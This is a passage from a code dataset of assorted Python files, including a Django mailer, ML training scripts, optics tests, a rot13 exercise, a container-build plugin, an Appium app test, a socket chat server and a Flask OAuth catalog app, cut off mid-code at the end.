this_campaign.group.contact_set.values_list('email', flat=True)\n\n html_content = letter\n text_content = strip_tags(letter)\n msg = EmailMultiAlternatives('test', text_content, 'me@me.me', email_list)\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n return redirect(campaign)\n\n","sub_path":"mailer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"200966430","text":"import numpy as np\nimport os\n\nimport tensorflow as tf\nfrom random import shuffle\n\nfrom tensorflow.keras.optimizers import Adam\n\nimport datetime\nimport LibFMP.B\nfrom utils_DL import autoTrain, weightedBinaryCrossentropy\nimport random\nfrom customModels import musicalCNN_Jo_lastConv_maxPool_LN_deepResNet\n\n\n########### MODEL 
######################################################\nmodel = musicalCNN_Jo_lastConv_maxPool_LN_deepResNet(B=3, \n C=5, \n L=75, \n numOctaves=6, \n numFilters=[20,20,10,1], \n size_filt1=(15,15), \n size2_filt2=3, stride2_filt2=3, \n dropout=0.2,\n alpha=0.3)\nmodel.summary()\n\nopt = Adam(learning_rate=0.0001)\n\nmodel.compile(optimizer=opt, loss='binary_crossentropy', \n metrics=['accuracy','binary_accuracy','binary_crossentropy','cosine_similarity','Precision','Recall'], \n run_eagerly=False)\n\nmodelName = datetime.datetime.now().strftime(format = \"%Y-%m-%d_%H-%M-%S\") + 'mCNN_DEEP-ResNet_trainMusicNet-BeethovenPiano-WagnerPianoScore'\n###################################################################################\nnumValFiles = 100\n\nmusicNetFolder = '../../../Datasets/MusicNet_tuning_50_snips'\nmusicNetFiles = [f for f in os.listdir(os.path.join(musicNetFolder, 'Chroma')) if '.npy' in f]\nshuffle(musicNetFiles)\nmusicNetTrainFiles = musicNetFiles[numValFiles:]\nmusicNetValFiles = musicNetFiles[:numValFiles]\n\nbeethovenFolder = '../../../Datasets/BeethovenPiano_tuning_50_snips'\nbeethovenFiles = [f for f in os.listdir(os.path.join(beethovenFolder, 'Chroma')) if '.npy' in f]\nshuffle(beethovenFiles)\nbeethovenTrainFiles = beethovenFiles[numValFiles:]\nbeethovenValFiles = beethovenFiles[:numValFiles]\n\nwagnerFolder = '../../../Datasets/WagnerRing_PianoScore_tuning_50_snips'\nwagnerFiles = [f for f in os.listdir(os.path.join(wagnerFolder, 'Chroma')) if '.npy' in f]\nshuffle(wagnerFiles)\nwagnerTrainFiles = wagnerFiles[numValFiles:]\nwagnerValFiles = wagnerFiles[:numValFiles]\n\n\ntrainData = {'files': [musicNetTrainFiles, beethovenTrainFiles, wagnerTrainFiles],\n 'pathHCQT': [os.path.join(musicNetFolder, 'HCQT'),\n os.path.join(beethovenFolder, 'HCQT'),\n os.path.join(wagnerFolder, 'HCQT')],\n 'pathChroma': [os.path.join(musicNetFolder, 'Chroma'),\n os.path.join(beethovenFolder, 'Chroma'),\n os.path.join(wagnerFolder, 'Chroma')]}\n\nvalData = {'files': [musicNetValFiles, beethovenValFiles, wagnerValFiles],\n 'pathHCQT': [os.path.join(musicNetFolder, 'HCQT'),\n os.path.join(beethovenFolder, 'HCQT'),\n os.path.join(wagnerFolder, 'HCQT')],\n 'pathChroma': [os.path.join(musicNetFolder, 'Chroma'),\n os.path.join(beethovenFolder, 'Chroma'),\n os.path.join(wagnerFolder, 'Chroma')]}\n\n\n##################################################################################\n\nautoTrain(model, modelName, trainData, valData, max_epochs=200, steps_per_epoch=4000, batchSize_train=25, batchSize_val=50, lr_decay=0.2, lr_min=1e-6, lr_patience=3, earlyStopping_patience=8, criterion='val_loss', criterion_mode='min', log=True)\n","sub_path":"TrainScripts/trainScript_mCNN_DEEP-ResNet_trainMusicNet-BeethovenPiano-WagnerPianoScore.py","file_name":"trainScript_mCNN_DEEP-ResNet_trainMusicNet-BeethovenPiano-WagnerPianoScore.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"114587602","text":"from django.urls import path\nfrom social_analysis import views\n\n\napp_name = 'social_analysis'\nurlpatterns = [\n path('', views.index, name='index'),\n path('', views.calculate, name='calculate'),\n path('all', views.calculate, name='calculate_all'),\n path('show_all', views.show_all_aggregate, name='show_all'),\n path('remaining', views.calculate_remaining, name='calculate_remaining'),\n path('/', views.calculate_by_period, 
name='calculate_by_time'),\n]\n","sub_path":"social_analysis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"25641998","text":"\nimport numpy as np\n\nfrom .. import poppy_core\nfrom .. import optics\nfrom .. import zernike\nfrom .. import wfe\n\nNWAVES = 0.5\nWAVELENGTH = 1e-6\nRADIUS = 1.0\nNPIX = 101\nDIAM = 3.0\n\ndef test_ZernikeAberration():\n # verify that we can reproduce the same behavior as ThinLens\n # using ZernikeAberration\n pupil = optics.CircularAperture(radius=RADIUS)\n lens = optics.ThinLens(nwaves=NWAVES, reference_wavelength=WAVELENGTH, radius=RADIUS)\n tl_wave = poppy_core.Wavefront(npix=NPIX, diam=DIAM, wavelength=WAVELENGTH)\n tl_wave *= pupil\n tl_wave *= lens\n\n zern_wave = poppy_core.Wavefront(npix=NPIX, diam=DIAM, wavelength=WAVELENGTH)\n # need a negative sign in the following b/c of different sign conventions for\n # zernikes vs \"positive\" and \"negative\" lenses.\n zernike_lens = wfe.ZernikeWFE(\n coefficients=[0, 0, 0, -NWAVES * WAVELENGTH / (2 * np.sqrt(3))],\n radius=RADIUS\n )\n zern_wave *= pupil\n zern_wave *= zernike_lens\n\n stddev = np.std(zern_wave.phase - tl_wave.phase)\n\n assert stddev < 1e-16, (\"ZernikeAberration disagrees with ThinLens! stddev {}\".format(stddev))\n\ndef test_wavefront_or_meters_decorator():\n zernike_lens = wfe.ZernikeWFE(\n coefficients=[0, 0, 0, NWAVES * WAVELENGTH / (2 * np.sqrt(3))],\n radius=RADIUS\n )\n opd_waves_a = zernike_lens.get_opd(WAVELENGTH)\n opd_waves_b = zernike_lens.get_opd(poppy_core.Wavefront(wavelength=WAVELENGTH))\n\n stddev = np.std(opd_waves_a - opd_waves_b)\n assert stddev < 1e-16, \"OPD map disagreement based on form of argument to get_opd!\"\n\ndef test_zernike_get_opd():\n zernike_optic = wfe.ZernikeWFE(coefficients=[NWAVES * WAVELENGTH,], radius=RADIUS)\n opd_map = zernike_optic.get_opd(WAVELENGTH, units='meters')\n assert np.max(opd_map) == NWAVES * WAVELENGTH\n\n opd_map_waves = zernike_optic.get_opd(WAVELENGTH, units='waves')\n assert np.max(opd_map_waves) == NWAVES\n\ndef test_ParameterizedAberration():\n # verify that we can reproduce the same behavior as ZernikeAberration\n # using ParameterizedAberration\n NWAVES = 0.5\n WAVELENGTH = 1e-6\n RADIUS = 1.0\n\n pupil = optics.CircularAperture(radius=RADIUS)\n\n zern_wave = poppy_core.Wavefront(npix=NPIX, diam=DIAM, wavelength=1e-6)\n zernike_wfe = wfe.ZernikeWFE(\n coefficients=[0, 0, 2e-7, NWAVES * WAVELENGTH / (2 * np.sqrt(3)), 0, 3e-8],\n radius=RADIUS\n )\n zern_wave *= pupil\n zern_wave *= zernike_wfe\n\n parameterized_distortion = wfe.ParameterizedWFE(\n coefficients=[0, 0, 2e-7, NWAVES * WAVELENGTH / (2 * np.sqrt(3)), 0, 3e-8],\n basis_factory=zernike.zernike_basis,\n radius=RADIUS\n )\n\n pd_wave = poppy_core.Wavefront(npix=NPIX, diam=3.0, wavelength=1e-6)\n pd_wave *= pupil\n pd_wave *= parameterized_distortion\n\n np.testing.assert_allclose(pd_wave.phase, zern_wave.phase,\n err_msg=\"ParameterizedAberration disagrees with ZernikeAberration\")\n","sub_path":"poppy/tests/test_wfe.py","file_name":"test_wfe.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"47083358","text":"################################################################################\n# Code\n################################################################################\n\nfrom string import uppercase, lowercase\n\ndef create_codex():\n 
lowerpairs = zip(lowercase, lowercase[13:] + lowercase[:13])\n upperpairs = zip(uppercase, uppercase[13:] + uppercase[:13])\n code_dict = dict(lowerpairs + upperpairs)\n return (lambda char: code_dict.get(char, char))\n\ndef rot13(message):\n codex = create_codex()\n return ''.join(map(codex, message))\n\n################################################################################\n# Tests\n################################################################################\nfrom codecs import encode\nimport random\n\nsolution = lambda s: encode(s, 'rot13')\n\ndef verify(s):\n assert rot13(s) == solution(s)\n assert rot13(rot13(s)) == s\n\nverify(\"test\")\nverify(\"Test\")\nverify(\"Avoid success at all costs!\")\nverify(\"abcdefghijklmnopqrstuvwxyz\")\nprint(\"OK\")\n","sub_path":"rot13/rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"197339584","text":"\"\"\"\nCopyright (c) 2019 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\"\"\"\nimport os\nimport subprocess\nimport tempfile\n\nfrom atomic_reactor.build import BuildResult\nfrom atomic_reactor.constants import (PLUGIN_SOURCE_CONTAINER_KEY, EXPORTED_SQUASHED_IMAGE_NAME,\n IMAGE_TYPE_DOCKER_ARCHIVE, PLUGIN_FETCH_SOURCES_KEY)\nfrom atomic_reactor.plugin import BuildStepPlugin\nfrom atomic_reactor.util import get_exported_image_metadata\n\n\nclass SourceContainerPlugin(BuildStepPlugin):\n \"\"\"\n Build source container image using\n https://github.com/containers/BuildSourceImage\n \"\"\"\n\n key = PLUGIN_SOURCE_CONTAINER_KEY\n\n def export_image(self, image_output_dir):\n output_path = os.path.join(tempfile.mkdtemp(), EXPORTED_SQUASHED_IMAGE_NAME)\n\n cmd = ['skopeo', 'copy']\n source_img = 'oci:{}'.format(image_output_dir)\n dest_img = 'docker-archive:{}'.format(output_path)\n cmd += [source_img, dest_img]\n\n self.log.info(\"Calling: %s\", ' '.join(cmd))\n try:\n subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n self.log.error(\"failed to save docker-archive :\\n%s\", e.output)\n raise\n\n img_metadata = get_exported_image_metadata(output_path, IMAGE_TYPE_DOCKER_ARCHIVE)\n self.workflow.exported_image_sequence.append(img_metadata)\n\n def run(self):\n \"\"\"Build image inside current environment.\n\n Returns:\n BuildResult\n \"\"\"\n fetch_sources_result = self.workflow.prebuild_results.get(PLUGIN_FETCH_SOURCES_KEY, {})\n source_data_dir = fetch_sources_result.get('image_sources_dir')\n remote_source_data_dir = fetch_sources_result.get('remote_sources_dir')\n\n source_exists = source_data_dir and os.path.isdir(source_data_dir)\n remote_source_exists = remote_source_data_dir and os.path.isdir(remote_source_data_dir)\n\n if not source_exists and not remote_source_exists:\n err_msg = \"No SRPMs directory '{}' available\".format(source_data_dir)\n err_msg += \"\\nNo Remote source directory '{}' available\".format(remote_source_data_dir)\n self.log.error(err_msg)\n return BuildResult(logs=err_msg, fail_reason=err_msg)\n\n if source_exists and not os.listdir(source_data_dir):\n self.log.warning(\"SRPMs directory '%s' is empty\", source_data_dir)\n if remote_source_exists and not os.listdir(remote_source_data_dir):\n self.log.warning(\"Remote source directory '%s' is empty\", remote_source_data_dir)\n\n image_output_dir = tempfile.mkdtemp()\n cmd = ['bsi', 
'-d']\n drivers = []\n\n if source_exists:\n drivers.append('sourcedriver_rpm_dir')\n cmd.append('-s')\n cmd.append('{}'.format(source_data_dir))\n\n if remote_source_exists:\n drivers.append('sourcedriver_extra_src_dir')\n cmd.append('-e')\n cmd.append('{}'.format(remote_source_data_dir))\n\n driver_str = ','.join(drivers)\n cmd.insert(2, driver_str)\n cmd.append('-o')\n cmd.append('{}'.format(image_output_dir))\n\n try:\n output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n self.log.error(\"BSI failed with output:\\n%s\", e.output)\n return BuildResult(logs=e.output, fail_reason='BSI utility failed build source image')\n\n self.log.debug(\"Build log:\\n%s\\n\", output)\n\n self.export_image(image_output_dir)\n\n return BuildResult(\n logs=output,\n oci_image_path=image_output_dir,\n skip_layer_squash=True\n )\n","sub_path":"atomic_reactor/plugins/build_source_container.py","file_name":"build_source_container.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"294189410","text":"# -*- coding:utf-8 -*-\n# import re\n# sys.path.append('..')\n\nfrom time import sleep\nimport unittest\nimport lib.public_functions as pubfuc\nimport multiprocessing\nfrom appium import webdriver\nimport testcase.huajiao_behavior as huajiao_behavior\nimport logging\n\nlogger = logging.getLogger('autolog')\n\n\nclass HuaJiaoTest(unittest.TestCase):\n\n def setUp(self):\n # 在当前目录,新建mail.txt,文件第一行存放设备列表,第二行存放roomid\n with open('mail.txt', 'r') as f:\n info = f.readlines()\n devicelist = info[0].rstrip().split(',')\n logger.info(f'devicelist: {devicelist}')\n self.device_name = devicelist\n self.roomid = info[1].split('#')[0].rstrip()\n self.sd = pubfuc.StartDriver(devicelist)\n self.proc_list = []\n\n pubfuc.cleannodeproc()\n for i in range(len(self.sd.devicelist)):\n self.proc_list.append(multiprocessing.Process(target=self.sd.startappiumserver, args=(i,)))\n\n for pro in self.proc_list:\n pro.start()\n\n for pro in self.proc_list:\n pro.join()\n\n while len(self.sd.getnodeprocpid()) < len(devicelist):\n sleep(1)\n\n logger.info(self.sd.getnodeprocpid())\n\n self.driverlist = []\n\n for i in range(len(self.sd.devicelist)):\n logger.info(i)\n desire_caps = self.sd.realdevice[i]\n if 'bundleId' in desire_caps:\n desire_caps['bundleId'] = 'com.huajiao.seeding' # bootstrapA50\n # desire_caps['waitForQuiescence'] = 'false'\n else:\n desire_caps['appPackage'] = 'com.huajiao.seeding'\n desire_caps['appActivity'] = 'com.huajiao.seeding'\n driver = webdriver.Remote(f\"http://localhost:{self.sd.aport[i]}/wd/hub\", self.sd.realdevice[i])\n sleep(10)\n self.driverlist.append(driver)\n\n logger.info(self.driverlist)\n\n def test_001开始直播(self):\n logger.info('test_001开始直播')\n procs = []\n pool = multiprocessing.Pool(processes=len(self.driverlist))\n for driver in self.driverlist:\n index = self.driverlist.index(driver)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"tab logo\"]').click()\n sleep(3)\n # logger.info(driver.page_source)\n # driver.find_element_by_xpath('//XCUIElementTypeImage[@name=\"tab_live\"]').click()\n driver.find_element_by_xpath('//XCUIElementTypeStaticText[@name=\"立即 直播\"]').click()\n sleep(5)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"开始直播\"]').click()\n sleep(10)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"live button close\"]').click()\n sleep(1)\n 
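# assumed flow: closing the live stream pops a confirmation dialog, and the\n            # \"确定\" (confirm) button tapped next belongs to that dialog\n            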
driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"确定\"]').click()\n sleep(2)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"video close\"]').click()\n sleep(10)\n # //XCUIElementTypeImage[@name=\"tab_live\"] #81 151\n # //XCUIElementTypeButton[@name=\"icon gd zbj\"]\n # //XCUIElementTypeImage[@name=\"icon_lm_gd\"] 连麦\n # //XCUIElementTypeStaticText[ @ name = \"立即 直播\"]\n # //XCUIElementTypeButton[@name=\"开始直播\"]\n # //XCUIElementTypeButton[@name=\"live button close\"] # location\n # //XCUIElementTypeButton[@name=\"确定\"]\n # //XCUIElementTypeButton[@name=\"video close\"]\n # //XCUIElementTypeButton[@name=\"live button music\"]\n # //XCUIElementTypeButton[@name=\"live icon line normal\"] # location\n # driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"tab me normal\"]').click()\n # driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"geren shezhi\"]').click()\n # //XCUIElementTypeStaticText[@name=\"关于花椒\"]\n # //XCUIElementTypeStaticText[@name=\"上传日志\"]\n # //XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeTable/XCUIElementTypeCell[1]/XCUIElementTypeOther[2]\n # //XCUIElementTypeStaticText[@name=\"上传完成\"]\n # //XCUIElementTypeButton[@name=\"好的\"]\n # //XCUIElementTypeButton[@name=\"titlebar back normal\"] # 返回按钮\n # driver.find_element_by_id('tab logo').click()\n # proc = pool.apply_async(huajiao_behavior.login, (driver, self.device_name[index], ))\n # procs.append(proc)\n for i in procs:\n i.get()\n for i in procs:\n i.wait()\n\n def tearDown(self):\n logger.info('test运行完成')\n # quite the device driver\n pass\n # for driver in self.driverlist:\n # driver.quit()\n\n\n\n","sub_path":"testcase/huajiao_testcase.py","file_name":"huajiao_testcase.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"95937109","text":"import socket, threading\n\nAddressList = []\nClientList = []\nUsernameList = []\n\ndef start():\n print(\"SERVER HAS STARTED\")\n global AddressList, ClientList, UsernameList\n\n ServerCommandThread = threading.Thread(target = Server_Commands)\n ServerCommandThread.start()\n\n while True:\n client, address = s.accept()\n cUsername = client.recv(1024).decode()\n\n thread = threading.Thread(target = Handle_Users, args = (client, address, cUsername))\n thread.start()\n AddressList.append(address)\n ClientList.append(client)\n UsernameList.append(cUsername)\n\n for x in ClientList:\n ServerMessage = \"[SERVER] New user connected --> \" + cUsername\n x.send(ServerMessage.encode())\n\ndef Handle_Users(client, address, chat_username):\n print(\"Connected to {}\".format(address))\n print(\"Total amount of users connected: {}\".format(threading.active_count() - 2))\n msg = \"\"\n DisconnectMessage = \"!disconnect\"\n\n while True:\n msg = client.recv(1024)\n msg = msg.decode()\n\n if msg != DisconnectMessage: \n msg = chat_username + \": \" + msg \n print(msg)\n\n for x in ClientList:\n if x == client:\n pass\n else:\n x.send(msg.encode())\n \n else:\n\n ClientList.remove(client)\n AddressList.remove(address)\n UsernameList.remove(chat_username)\n client.close()\n break\n\n\ndef Server_Commands():\n ServerSwitch = True\n\n while ServerSwitch:\n Server_Request = input()\n if Server_Request == \"/userlist\":\n print(\"[{}]USERNAME LIST:\".format(threading.active_count() - 2))\n for x in UsernameList:\n print(x)\n elif Server_Request == \"/addrlist\":\n print(\"CONNECION ADDRESS LIST:\")\n for x in AddressList:\n print(x)\n\n\n\n\nif __name__ 
== \"__main__\":\n\n HEADER = 10\n PORT = 5050\n SERVERIP = '192.168.1.7'\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((SERVERIP, PORT))\n s.listen()\n start()\n\n","sub_path":"SimpleServer.py","file_name":"SimpleServer.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"257863203","text":"from keras import activations\nfrom ray.rllib.models.tf.tf_modelv2 import TFModelV2\nfrom ray.rllib.utils.framework import try_import_tf\n\n_, tf, tfv = try_import_tf()\n\nclass HerdingModel(TFModelV2):\n\n def __init__(self, obs_space, action_space, num_outputs, model_config, name):\n super(HerdingModel, self).__init__(obs_space, action_space, num_outputs, model_config, name)\n\n self.inputs = tf.keras.layers.Input(shape=obs_space.shape, name=\"observations\")\n x = tf.keras.layers.MaxPooling1D(pool_size=2)(self.inputs)\n x = tf.keras.layers.Conv1D(filters=16, kernel_size=4, strides=2)(x)\n x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(units=70)(x)\n x = tf.keras.layers.Dense(units=30)(x)\n layer_out = tf.keras.layers.Dense(units=num_outputs, name='action')(x)\n\n value_out = tf.keras.layers.Dense(units=1)(x)\n self.base_model = tf.keras.Model(self.inputs, [layer_out, value_out])\n\n self.register_variables(self.base_model.variables)\n\n def forward(self, input_dict, state, seq_lens):\n model_out, self._value_out = self.base_model(tf.cast(input_dict[\"obs\"], tf.float32))\n\n return model_out, state\n\n def value_function(self):\n return tf.reshape(self._value_out, [-1])\n","sub_path":"rl/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"378552612","text":"from flask import Flask\nfrom flask import render_template, request, make_response\nfrom flask import redirect, url_for, jsonify\nfrom flask import session as login_session\nfrom sqlalchemy import desc\n\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\n\nfrom database import db_session, init_db\nfrom models import Category, Item\n\nimport random\nimport string\nimport httplib2\nimport json\nimport requests\n\n# get the client id from google api\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read()\n )['web']['client_id']\n\napp = Flask(__name__)\napp.secret_key = 'super-secret-fsnd-key'\n\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db_session.remove()\n\n\n@app.route('/')\ndef index():\n # display the categories list and the most recent items\n categories = Category.query.all()\n latest_items = Item.query.order_by(desc(Item.created_on)).limit(10).all()\n is_logged_in = 'username' in login_session\n return render_template('index.html',\n categories=categories,\n latest_items=latest_items,\n is_logged_in=is_logged_in)\n\n\n@app.route('/catalog.json')\ndef catalog_json():\n # return a json of the categories and it's items\n categories_data = []\n categories = Category.query.all()\n\n for category in categories:\n items = Item.query.filter_by(category_id=category.id).all()\n items_data = []\n\n for item in items:\n items_data.append(item.serialize)\n\n category_data = category.serialize\n category_data['items'] = items_data\n categories_data.append(category_data)\n\n return jsonify(categories_data)\n\n\n@app.route('/login')\ndef login():\n # generate 
a token for the session\n state = ''.join(\n random.choice(string.ascii_uppercase + string.digits) for x in xrange(32)\n )\n login_session['state'] = state\n return render_template('login.html', STATE=state)\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # obtain authorization code\n code = request.data\n try:\n # upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps('Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # check that the access token is valid\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n # abort if there was an error\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # verify that the access token is used for the intended user\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_credentials = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_credentials is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps('Current user already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # store the access token in the session for later use\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # get user info\n userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n return redirect(url_for('index'))\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n access_token = login_session.get('access_token')\n # check if the user was not logged in\n if access_token is None:\n response = make_response(\n json.dumps('Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # try to disconnect\n url = ('https://accounts.google.com/o/oauth2/revoke?token=%s'\n % access_token)\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n\n if result['status'] == '200':\n del login_session['access_token']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n\n return redirect(url_for('index'))\n else:\n response = make_response(\n json.dumps('Failed to revoke token for given user.'), 400)\n response.headers['Content-Type'] = 'application/json'\n return 
response\n\n\n@app.route('/catalog/<category_name>/items')\ndef show_category(category_name):\n    # display all the items for the given category\n    categories = Category.query.all()\n    category = Category.query.filter_by(name=category_name).first()\n    items = Item.query.filter_by(category_id=category.id).all()\n    return render_template('category.html',\n                           categories=categories,\n                           category=category,\n                           items=items,\n                           qty_items=len(items))\n\n\n@app.route('/<category_name>.json')\ndef category_json(category_name):\n    # return a json of all the items of the selected category\n    category = Category.query.filter_by(name=category_name).first()\n    items = Item.query.filter_by(category_id=category.id).all()\n\n    items_data = []\n    for item in items:\n        items_data.append(item.serialize)\n\n    return jsonify({\n        'id': category.id,\n        'name': category.name,\n        'items': items_data\n    })\n\n\n@app.route('/catalog/<category_name>/<item_name>')\ndef show_item(category_name, item_name):\n    # display the item information of the given item\n    category = Category.query.filter_by(name=category_name).first()\n    item = Item.query.filter(\n        (Item.category_id == category.id) & (Item.name == item_name)).first()\n    is_logged_in = 'username' in login_session\n    return render_template('item.html',\n                           item=item,\n                           is_logged_in=is_logged_in)\n\n\n@app.route('/<category_name>/<item_name>.json')\ndef item_json(category_name, item_name):\n    # return a json with the details of the selected item\n    category = Category.query.filter_by(name=category_name).first()\n    item = Item.query.filter(\n        (Item.category_id == category.id) & (Item.name == item_name)).first()\n    return jsonify(item.serialize)\n\n\n@app.route('/catalog/item/new', methods=['GET', 'POST'])\ndef new_item():\n    # check if the user is logged in first\n    if 'username' not in login_session:\n        return redirect(url_for('login'))\n\n    categories = Category.query.all()\n\n    # get the form data and create a new item\n    if request.method == 'POST':\n        i = Item(\n            request.form['title'],\n            request.form['description'],\n            int(request.form['category'])\n        )\n        db_session.add(i)\n        db_session.commit()\n        return redirect(url_for('index'))\n\n    return render_template('edit.html',\n                           categories=categories)\n\n\n@app.route('/catalog/<item_name>/edit', methods=['GET', 'POST'])\ndef edit_item(item_name):\n    # check if the user is logged in first\n    if 'username' not in login_session:\n        return redirect(url_for('login'))\n\n    categories = Category.query.all()\n    item = Item.query.filter_by(name=item_name).first()\n\n    # get the form data and update the selected item\n    if request.method == 'POST':\n        item.title = request.form['title']\n        item.description = request.form['description']\n        item.category_id = int(request.form['category'])\n        db_session.commit()\n\n        return redirect(url_for('index'))\n\n    return render_template('edit.html',\n                           categories=categories,\n                           item=item)\n\n\n@app.route('/catalog/<item_name>/delete')\ndef delete_item(item_name):\n    # check if the user is logged in first\n    if 'username' not in login_session:\n        return redirect(url_for('login'))\n\n    # redirects to the confirmation page\n    return render_template('delete.html',\n                           item_name=item_name)\n\n\n@app.route('/catalog/<item_name>/confirm_delete')\ndef confirm_delete_item(item_name):\n    # check if the user is logged in first\n    if 'username' not in login_session:\n        return redirect(url_for('login'))\n\n    # delete the item\n    item = Item.query.filter_by(name=item_name).first()\n    db_session.delete(item)\n    db_session.commit()\n    return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n    init_db()\n    app.debug = True\n    app.run(host='0.0.0.0', port=5000)\n","sub_path":"vagrant/catalog/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":9729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"23622384","text":"\"\"\" Packaged MASAC\"\"\"\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\n\ndef init_layer_uniform(layer: nn.Linear, init_w: float = 3e-3) -> nn.Linear:\n    layer.weight.data.uniform_(-init_w, init_w)\n    layer.bias.data.uniform_(-init_w, init_w)\n\n    return layer\n\nclass Actor(nn.Module):\n    def __init__(\n        self,\n        in_dim: int,\n        out_dim: int,\n        log_std_min: float = -20,\n        log_std_max: float = 2,\n        hidden_dim1: int = 128,\n        hidden_dim2: int = 128):\n        super(Actor, self).__init__()\n\n        self.log_std_min = log_std_min\n        self.log_std_max = log_std_max\n\n        self.hidden1 = nn.Linear(in_dim, hidden_dim1)\n        self.hidden2 = nn.Linear(hidden_dim1, hidden_dim2)\n\n        log_std_layer = nn.Linear(hidden_dim2, out_dim)\n        self.log_std_layer = init_layer_uniform(log_std_layer)\n\n        mu_layer = nn.Linear(hidden_dim2, out_dim)\n        self.mu_layer = init_layer_uniform(mu_layer)\n\n    def forward(self, state: torch.Tensor) -> torch.Tensor:\n        x = F.relu(self.hidden1(state))\n        x = F.relu(self.hidden2(x))\n\n        mu = self.mu_layer(x).tanh()\n\n        log_std = self.log_std_layer(x).tanh()\n        log_std = self.log_std_min + 0.5 * (\n            self.log_std_max - self.log_std_min\n        ) * (log_std + 1)\n        std = torch.exp(log_std)\n\n        dist = Normal(mu, std)\n        z = dist.rsample()\n\n        action = z.tanh()\n        log_prob = dist.log_prob(z) - torch.log(1 - action.pow(2) + 1e-7)\n        log_prob = log_prob.sum(-1, keepdim=True)\n\n        return action, log_prob\n\n\nclass CriticQ(nn.Module):\n    def __init__(\n        self,\n        in_dim: int,\n        hidden_dim1: int = 128,\n        hidden_dim2: int = 128):\n        super().__init__()\n\n        self.hidden1 = nn.Linear(in_dim, hidden_dim1)\n        self.hidden2 = nn.Linear(hidden_dim1, hidden_dim2)\n        # hidden2 outputs hidden_dim2 features, which the value head consumes\n        self.out = nn.Linear(hidden_dim2, 1)\n        self.out = init_layer_uniform(self.out)\n\n    def forward(\n        self,\n        state: torch.Tensor,\n        action: torch.Tensor) -> torch.Tensor:\n        x = torch.cat((state, action), dim=-1)\n        x = 